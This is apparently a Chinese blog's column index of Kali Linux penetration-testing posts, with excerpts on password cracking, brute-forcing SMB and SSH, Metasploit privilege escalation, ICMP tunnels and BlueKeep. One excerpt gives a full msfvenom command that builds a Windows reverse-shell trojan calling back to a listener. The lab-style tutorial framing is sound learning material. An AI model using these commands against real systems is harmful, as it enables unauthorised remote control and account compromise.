
kali
佛性死磕
学的更多,只为自由。
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
python2和3的pip2、pip3在kali上安装
0x01 pip(python2)安装:wget https://bootstrap.pypa.io/2.6/get-pip.pypython2 get-pip.pypip -V0x02 pip3(python3)安装wget https://bootstrap.pypa.io/get-pip.pypython3 get-pip.pypip3 -V原创 2020-12-02 10:29:28 · 1346 阅读 · 0 评论 -
shadow的密码与破解
数字和所使用的加密算法对应关系:格式 算法$1 md5$2a blowfish$2y blowfish$5 sha-256$6 sha-512json shdownjson --show shdown原创 2020-09-20 15:55:03 · 4865 阅读 · 0 评论 -
python的字典生成工具
前言:命运,依旧在自己手中!安装pydictorgit clone https://github.com/LandGrey/pydictor常用使用命令,社工学--sedb其中option的对应解释set ename Lbbrun结果合并去重python pydictor.py -tool uniqbiner 合并去重的文件目录多字典文件组合python pydictor.py -tool hybrider 1.txt 3.txt...原创 2020-09-12 23:36:49 · 685 阅读 · 0 评论 -
爆破445端口和22端口拿shell
工具hydua、nmap使用nmap扫描是否开启smb服务即445端口发现开启,制作字典passwd.txt使用v原创 2020-03-31 12:48:33 · 4512 阅读 · 1 评论 -
隐藏通信隧道之ICMPSH
内网渗透_建立icmp隧道-t host :要向其发送ping请求的主机ip地址。此选项是必需的!-r:发送一个包含字符串“Test1234”的测试icmp请求,然后退出。这是用来测试连接的。-d milliseconds:请求之间的延迟(毫秒)-o milliseconds:毫秒响应超时(毫秒)。如果没有及时收到回复,奴隶将增加一个空白计数器。如果计数器达到某个限制,则从机将退出。如果收...原创 2020-03-22 08:35:07 · 779 阅读 · 3 评论 -
收集子域名的好工具
前言:许她花田半亩列出几个比较好用的工具1.谷歌:site:域名2.网站:爱站:IP反查域名:https://dns.aizhan.com/dnsdumpster:给出地理位置及图形和子域名:https://dnsdumpster.com/phpinfo:子域名爆破:https://phpinfo.me/domain/3.工具:kali下: - Maltego:图形化 ...原创 2020-03-12 11:24:33 · 1350 阅读 · 0 评论 -
msf之使用震网三代来提权
cve_2017_8464_lnk_lpe,他就是震网三代的exploit上次没有成功将x64的搞定,现在搬来了震网三代看我来个远程执行漏洞的提权前面已经拿到shell,但没有system权限我也是稍微找了以下exploit,真是大海捞针偶然发现use exploit/windows/local/cve_2017_8464_lnk_lpe设置好sessions,直接把权限提到...原创 2020-03-07 18:29:46 · 354 阅读 · 1 评论 -
msf之提权操作
愿疫情早日结束,重返校园奋斗使用getsystem来获得最高权限getsystem发现却爆出这样的错误[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:[-] Named Pipe Impersonation (In Memory...原创 2020-03-07 17:57:11 · 2708 阅读 · 0 评论 -
msf之制作木马进行远程控制
msfvenom制作木马msfvenom -a x64 --platform windows -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.176.129 LPORT=4444 -b"\x00" -f exe > msf.exemsf设置监听use exploit/multi/handler设置payloadset ...原创 2020-03-07 16:44:38 · 3843 阅读 · 1 评论 -
最新kali安装tor_外网走起
出现“有未能满足的依赖关系。请尝试不指明软件包的名字来运行“apt --fix-broken install”(也可以指定一个解决办法)。”解决方案:sudo apt --fix-broken install -y再执行sudo apt update && sudo apt full-upgrade -ysudo apt install tor -y...原创 2020-03-03 09:38:34 · 10164 阅读 · 6 评论 -
黑客攻击——怎么可以不懂Netcat
Netcat中文名:瑞士军刀它身材小却有大功能:拥有侦听、传输、telnet、获取banner、传输文本文件、加密、远程控制、流媒体、远程克隆硬盘。在Linux下几乎都有安装,你只要在shell敲下nc就可以看看有没有nc格式:nc [参数] ip port [文件]参数:-v :详细信息-n:不进行dnsji...原创 2020-02-28 19:02:45 · 623 阅读 · 0 评论 -
各种Linux源的配置
各种Linux源的配置:ubuntu,kali,reubuntu在/etc/apt/sources.listvim /etc/apt/sources.listkali在 /etc/apt/sources.listvim /etc/apt/sources.list然后把源复制进去阿里源(亲测可以)deb http://mirrors.aliyun.com/ubuntu/ bio...原创 2020-02-28 11:18:18 · 713 阅读 · 0 评论 -
在配置静态ip的时候,一定要先做这一步!
很多次在修改Linux虚拟机的dchp改为静态ip时候,重启之后总会连接不上网络,但打开配置,如/etc/sysconfig/network-scripts/ifcfg-eth0 (centos7),/etc/network/interfaces(ubuntu/kali),这几个分别是集中系统的ip修改路径。在配置静态ip的时候,一定要先做这一步先停止网卡service NetworkMa...原创 2020-02-23 20:25:10 · 471 阅读 · 0 评论 -
Python之路之socket陷阱
写一段小脚本,运行却发现各中错误import socketsocket.setdefaulttimeout(2)s = socket.socket()s.connect(("192.168.176.141",21))ans = s.recv(1024)print ansTraceback (most recent call last):File “1.py”, line 5, i...原创 2020-02-11 15:24:02 · 793 阅读 · 0 评论 -
kali下制作破解密码的字典
介绍几个kali下制作破解密码的字典的工具当你要破解一个邮箱、管理员登陆网页、数据库等,为了提高效率,这时候就需要制作具有针对性的字典。0x00_CUPP身份验证的最常见形式是用户名和密码或密码短语的组合。如果两个匹配值都存储在本地存储的表中,则对用户进行连接身份验证。密码强度是通过密码技术或基于库的备用值自动测试来猜测或破解密码所涉及的难度的度量。弱密码可能非常短,或者仅使用字母数字字符...原创 2020-02-09 00:53:37 · 12356 阅读 · 1 评论 -
kali之rarcrack暴力破解.rar,.zip,.7z压缩包
kali的rarcrack安装方法0x00_安装方法一先下载rarcrack,地址为http://www.wmzhe.com/soft-28886.html再解压,其中,-j:有bz2属性的、-x:解压、-f: 使用档案名字。tar -xjf rarcrack-0.2.tar.bz2cd rarcrack-0.2然后再原码安装make && make inst...原创 2020-02-05 09:34:41 · 17706 阅读 · 10 评论 -
Kali的软件安装、升级的几个命令的区别
APT软件包处理工具、和Debian软件包管理器和源代码压缩包0x00_APT软件包处理工具:APT软件包处理工具是用于安装和删除软件包,简写为apt-get,其安装过程可以处理好安装所需要的依赖关系,当在更新的时候,如有软件包不再使用时会提示用户删掉。安装应用程序和软件包1.安装软件包apt-get install [package_name]2.更新,每次安装新软件包、升级操作系...原创 2020-02-02 13:02:24 · 5466 阅读 · 0 评论 -
基于Linux下的root提权骚操作
0x00_前言小小博客,大大梦想。博主还是小白,总结几个有关于在入侵靶机后,如何在Linux下的关于普通用户提权到root下的操作,如有错误或其他请多多包含,希望提出多交流。0x01_操作简介提权的三个骚操作:内核溢出明文密文解密计划任何进程密码复用加粗样式...原创 2020-01-30 14:51:24 · 5736 阅读 · 1 评论 -
对共享文件进行渗透攻击及配置samba的smb.conf使得kali能免用户密码登陆
对共享文件进行渗透攻击及配置samba的smb.conf使得kali能免用户密码登陆直接上smb.conf文件截图介绍使用kali,smbclient对共享文件进行渗透挖掘smbclient -L 192.168.176.139如果没有对文件进行配置,smbclient '\192.168.176.139$share‘会出现下面问题配置完毕的话smbclient ‘\1...原创 2020-01-27 23:21:34 · 1193 阅读 · 0 评论 -
cve_2019_0708_bluekeep的远程桌面漏洞复现
cve_2019_0708_bluekeep的远程桌面漏洞复现0x00_简介2019年5月14日,微软发布了本月安全更新补丁,其中修复了远程桌面协议(RDP)远程代码执行漏洞。未经身份验证的攻击者利用该漏洞,向目标Windows主机发送恶意构造请求,可以在目标系统上执行任意代码。由于该漏洞存在于RDP协议的预身份验证阶段,因此漏洞利用无需进行用户交互操作。该漏洞存在被不法分子利用进行蠕虫攻击的...原创 2020-01-21 21:51:26 · 1142 阅读 · 0 评论 -
基于nmap的信息收集渗透测试
基于nmap的信息收集渗透测试语法介绍Nmap ,”Network Mapper”,”网络映射器”三个作用:1.探测一组主机是否在线2.扫描主机端口,嗅探所提供的网络服务3.判断主机使用的操作系统Nmap的安装目录:share/nmap/scripts,包含脚本(不同操作系统可能不一样)Nmap工作原理Nmap使用TCP/IP协议栈指纹对目标主机的操作系统类型进行判断。描述:1...原创 2020-01-19 23:31:50 · 401 阅读 · 0 评论